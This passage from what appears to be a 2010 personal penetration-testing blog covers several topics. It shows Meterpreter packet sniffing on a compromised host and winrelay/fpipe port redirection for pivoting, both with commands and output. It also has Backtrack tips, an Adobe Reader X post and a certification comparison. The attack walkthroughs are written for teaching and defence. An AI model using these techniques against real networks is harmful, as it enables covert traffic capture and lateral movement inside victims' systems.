    sniffer_start       Start packet capture on a specific interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet capture on a specific interface

...we can then examine what interfaces we have on the remote victim system. This system has two interfaces (which is interesting in itself) and we go ahead and start the sniffer on the first interface:

meterpreter > sniffer_interfaces

1 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'VMware Accelerated AMD PCNet Adapter' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

meterpreter > sniffer_start 1
[*] Capture started on interface 1 (50000 packet buffer)

During the capture, we can check progress of the collection by issuing a sniffer stats command:

meterpreter > sniffer_stats 1
[*] Capture statistics for interface 1
        bytes: 32178
        packets: 211

...and then dump some traffic:

meterpreter > sniffer_dump 1
[-] Usage: sniffer_dump [interface-id] [pcap-file]
meterpreter > sniffer_dump 1 test1.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 910 packets (137240 bytes)
[*] Downloaded 100% (137240/137240)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1.pcap
meterpreter > lpwd
meterpreter > sniffer_dump 1 test1b.pcap
[*] Flushing packet capture buffer for interface 1...
[*] Flushed 4609 packets (787199 bytes)
[*] Downloaded 066% (524288/787199)...
[*] Downloaded 100% (787199/787199)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test1b.pcap

So, we have downloaded a couple of captures to our /root directory. Let's try the other interface, so see if there is any data there also:

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 test2.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 18 packets (3924 bytes)
[*] Downloaded 100% (3924/3924)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2.pcap
meterpreter > sniffer_dump 2 test2b.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 296 packets (57775 bytes)
[*] Downloaded 100% (57775/57775)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to test2b.pcap

Capturing the data didn't take long at all, as it is a very easy process. Now that we have our pcap network capture files, we can examine them locally at our leisure on the attacker system. This can be done with a nice graphical tool like Wireshark, to filter the traffic and see what we could learn about the remote victim network.

Here we filter Netbios/SMB broadcast traffic to see what systems we can see on the remote network. This is especially good for finding live Windows systems (which are rather noisy on a LAN)

Other filters could be applied to other broadcast traffic such as; address resolution (ARP, RARP), router discovery, routing protocol advertisements, DHCP, AppleTalk, and other broadcast services, such as file and print.

Using these methods, we can gather a list of live IP addresses, address ranges, and machine types, and all this information can be collected before we even start actively scanning the remote network. This keeps a very low profile for targeted attacks.


Once a single system is compromised, it is only a matter of a short amount of time before an attacker can gather enough local information to "pivot" his attack and extend the attack to other local systems.

In secure environments, it is vitally important that every host is secured. This includes virtual hosts, and test systems, as these could also be used as bridgehead to silently sniff, or attack other systems on the internal LAN.

Also, it is important that there is sufficient network segmentation, internal firewalls and limiting of broadcast traffic, to help minimise the damage in the case of a single compromised system.

Backtrack 4 tips: KDE Konsole tabs

When working with Backtrack 4, it is common to have multiple shells open (I do this all the time)

You may want one for a Metasploit console, one for a Python shell, one for generating some shellcode, one for a reverse shell listener, port redirection, tcpdump/tsharck etc. (Well this is how I work anyway).

Here is a top tip for managing your many shells.

KDE Konsole tabs

KDE Konsole lets you have tabbed shells (so use them well). Tabs are displayed along the bottom of the window (or the top if you prefer).

To work efficiently with several concurrent shells:
  1. Open a few Konsole tabs in the same window by clicking on the new tab window (bottom left button)
  2. Quickly label your tabs (Ctrl + Alt + S) and enter a name (It only takes a few seconds, and saves hunting for the right shell!)
  3. To scroll between shell tabs use Shift + arrow keys
  4. To move your shell tabs around, use Ctrl + shift + arrow keys
  5. Add more shells (Ctrl + shift + N) and label them as you need them
  6. Exit the ones you don't need any more, with the button, bottom right (no shortcut for this which prevents mistakes!)

I find this makes managing many shells a lot easier. Rather than have lots of windows open, you can see what you have open all in one place and "Shift-arrow" between them, and then "Alt-tab" to your other applications and back. (The keyboard is a lot quicker than a mouse ;o)

I can easily and quickly manage 10 to 15 shells at once with these methods - that's probably as much as I have every needed.

Switching desktops

I often use more than one desktop. Maybe I have some web-browsing on one screen, and while reviewing some course material on another, and have an exploit development setup going on another.

If you want to fast-switch between desktops in KDE, then the keyboard shortcut is "Ctrl-F1", for the first screen, "Ctrl-F2" for the second, etc...

(took me a while to find that one, but it is pretty handy, I was used to "Ctrl-ArrowKeys" in Gnome)

Tuesday, 23 November 2010

Backtrack 4 R2 released - my first upgrades and use of it today

I have been playing around with the latest release of Backtrack (Version 4 R2, which was released on Friday) for most of today.

Backtrack is the world best Linux distribution for Ethical Hacking and Penetration testing, with hundreds of tools built in and configured ready to go.

The latest distribution can be downloaded from here
and this is a screen shot from one of my systems I upgraded this morning, from a DVD ISO image I cut with Brasero.

This is a Dell Mini10 system so can be a bit fussy with the drivers etc, but everything worked fine out of the box. Even the boot-splash works this time (using the "fix-splash800" command).

For my other test system I used the alternative method to get to R2, using the the following commands.

apt-get update && apt-get dist-upgrade

This was a pretty quick process, and apart from my Firefox shortcuts disappearing, pretty seamless.

I've been using these systems all day and haven't found any issues yet, so all good so far.

Monday, 22 November 2010

Using winrelay or fpipe for port redirection via a Windows host

When attacking networks in a pentest, it is sometimes useful to be able to redirect tcp or udp traffic, via an intermediary system.

This may be to obfuscate the source of the attack, or perhaps because the victim host (ip address and port combination) is not directly accessable for the attacking machine.

This is commonly used in pivoting, i.e. to attack an initial host, and then use that compromised system to attack other systems on the network, which were not initially accessable.

Here we look at two Windows commandline tools which can be used for port redirection; winrelay and fpipe, and test them.

These techniques should only be used on your own test systems, or where you have express permittion to do penetration testing.

winrelay from

This tool can be downloaded here and there are various options:

Let's look at an example:
The command below would be run on the intermediary system. The victim system in this case is on port 80. 

C:\>winrelay.exe -lip -lp 81 -dip -dp 80 -proto tcp

WinRelay 2.0 - (c) 2002-2003, Arne Vidstrom (

This can be tested easily by using netcat and typing a simple HTTP GET request from the attacking system. For example

nc -nvv 81
(UNKNOWN) [] 81 (?) open

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 13:05:55 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
Last-Modified: Mon, 22 Nov 2010 09:01:37 GMT
ETag: "259f4a-9-495a080ea7e40"
Accept-Ranges: bytes
Content-Length: 9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

sent 17, rcvd 306

So that worked fine, but winrelay doesn't log any connections to the screen, so not much to see on the intermediary system.

In my testing I also tried using wfuzz to try to brute force some common webserver file locations on my victim system using the relay. It worked well and here is the output:

Fpipe.exe from foundstone

This tool can be downloaded here and, again there are various options, so we will do a similar test to that above:

C:\Documents and Settings\Administrator\Desktop>fpipe -l 82 -c 512 -r 80
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.

Pipe connected:
   In: -->
  Out:  -->
Pipe connected:
   In: -->
  Out:  -->

As you can see, Fpipe logs connections to the screen, so more to see, and the HTTP GET request test from the attacking system (below) works as expected.

nc -nvv 81
(UNKNOWN) [] 81 (?) open
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 13:14:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-bt0 with Suhosin-Patch
Last-Modified: Mon, 22 Nov 2010 09:01:37 GMT
ETag: "259f4a-9-495a080ea7e40"
Accept-Ranges: bytes
Content-Length: 9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

 sent 17, rcvd 306

However, I found difficulty in getting the web brute force attack to work using fpipe. I will have to have a look with wireshark when I have more time to see what was going wrong...

Saturday, 20 November 2010

Adobe PDF Reader X; The worlds most dangerous desktop application gets a fix

Lets face it; the security record of Adobe has not been good over the past few years, with an increasing number of exploits for Adobe products available in the wild.

These have frequently made network security professionals jobs difficult, with several 0-day PDF vulnerabilities meaning that attackers could easily penetrate network defenses using a client-side attack, by sending a malicious PDF document in an email or URL for example.

The difficulty of blocking these threats

These attacks have been very difficult to do anything about, especially as the malicious documents could be specially crafted as part of sophisticated spear-phishing attack, with uniquely created or encoded payloads. This is a lot easier than it sounds, if you have the knowledge, and there is no way that a signature-based anti-virus tool would have been able to stop such targeted attacks.

Also as usage of PDF documents is ubiquitous in the commercial world, so there was no way that system administrators could justify blocking all PDFs at the boundary.

A solution

Thankfully Adobe X Reader is here which uses sandbox technology to isolate threats in PDF documents. It may take a while before most enterprises deploy this software to all of their computer systems. Meanwhile the door is still open for attackers. (I am sure there are more vulnerabilities still to be discovered in older versions of Adobe Reader)

So, if you are a security manager or sysadmin, and are keen to secure your network from this type of attack, I suggest you put a plan together to roll this out to all of your desktops and laptops, as soon as you can.

Pentesting with Backtrack and the OSCP certification vs more theoretical courses

I am a firm believer that IT Security certification should have a big element of practical and real-world training and testing.

Having studied and passed the CISSP and CISM certifications, I can speak from experience that these don't really teach someone how to defend a company from malicious attack, nor do they cover any detail of the techniques that modern attackers will use to penetrate networks.

It looks to me that CISSP, CISM, and even CEH (Certified Ethical Hacker) are a class of exam that teach "information" rather than "knowledge". I feel that true knowledge comes from real experience, and the practical application of information and techniques.

I am not knocking CISSP, CISM, or CEH, these certification are great, and give a very good background in IT Security from either a management or technical perspective. In addition, these certifications require you to submit proof of a level of work experience in IT Security.

What I am saying, is that I feel security experts need real world "offensive" experience to truly understand threats. I also feel that it is important for exams to prove practical skills, which is why I would recommend the Offensive Security courses.

A comparison theoretical vs practical exams

CISSP is a 6 hour exam of multiple choice questions. Read the question (several times) and then tick box A, B, C or D - for 6 hours.

It's a tough certification, and some of the questions are worded in an awkward way. It covers an extremely broad field of IT Security, so it proves you can memorize and recall lots of information, but I feel it does not prove what you can do, or what you truly know.

Compare that to an exam like OSWP (which I passed earlier this year) in which you have 4 hours to break into several secured wireless access points, and write a report to prove what you have found and how - It's a different ball game altogether, and I have to say, it was the most enjoyable exam I have ever taken!

I am currently in the process of studying Pentesting with Backtrack, which culminates in a 24 hour live pentest exam, where you have to break into various systems.

You then have a further 24 hours to write-up and submit your results in a professional penetration test report. (apparently most students stay awake and work for the full 24 hours of the pentest, so it's no walk in the park)

What are the benefits of practical exams?

Clearly, if you are looking to be a real-world penetration tester, there is no better training, or proof that you know what you know, than practical courses and exams like the ones offered by Offensive Security.

If you are a network defender, the techniques learned on a course like PwB are invaluable in teaching you the importance of patch management, secure coding, secure configurations, the dangers information leakage and poor passwords. It will also likely give you an improvement in your general networking knowhow for Linux and Windows systems.

For example; In my view, there is nothing like the experience of cracking a file full of password hashes, in a few seconds, to make you have a much better appreciation of what makes passwords secure, and to change your behavior to choose better passwords.

I certainly choose better passwords now ;o)

My recommendation

To be a well rounded and knowledgable IT Security professional, you need a mix of training and certifications, some theoretical, and some very practical.